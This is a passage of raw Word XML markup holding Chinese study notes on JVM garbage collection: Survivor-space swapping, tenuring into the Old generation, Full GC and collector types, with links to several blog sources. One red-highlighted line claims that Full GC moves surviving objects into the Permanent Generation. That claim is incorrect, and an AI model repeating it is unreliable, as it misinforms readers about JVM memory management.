          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>肯定会被清空</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>），另一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>From Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）里不能被</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>回收的对象也会被放入这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>To Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>），始终保证一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是空的。（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MinorGC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>完成之后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">To Survivor </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> From Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的标记互换）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>     4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）当做第</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>步的时候，如果发现存放对象的那个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>满了，则这些对象被</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>old</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0313E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>urvivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0313E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区没有满，但是有些对象已经足够</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0313E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Old</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0313E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0313E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XX:MaxTenuringThreshold</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0313E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数来设置），也被放入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0313E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Old</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0313E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>     5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Old</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区被放满的之后，进行完整的垃圾回收，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Full GC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="D6D3CD"/>
        <w:spacing w:line="315" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>     6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Full GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，整理的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Old Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里的对象，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>把存活的对象放入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Permanent Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="323E32"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="002836FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://blog.sina.com.cn/s/blog_68158ebf0100wp83.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002836FA" w:rsidRPr="00F41A4C" w:rsidRDefault="002836FA" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE54B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE54B7" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>给了三种选择：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>串行收集器、并行收集器、并发收集器</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，但是串行收集器只适用于小数据量的情况，所以这里的选择主要针对并行收集器和并发收集器。默认情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以前都是使用串行收集器，如果想使用其他收集器需要在启动时加入相应参数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会根据当前</w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="336699"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>系统配置</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行判断。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C6BBD" w:rsidRPr="00F41A4C" w:rsidRDefault="006C6BBD" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C6BBD" w:rsidRPr="00F41A4C" w:rsidRDefault="006C6BBD" w:rsidP="006C6BBD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/llbupt/article/details/6661161</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C6BBD" w:rsidRPr="00F41A4C" w:rsidRDefault="00DA54D7" w:rsidP="006C6BBD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidR="006C6BBD" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/corson/archive/2012/01/04/2311974.html</w:t>
        </w:r>
      </w:hyperlink>
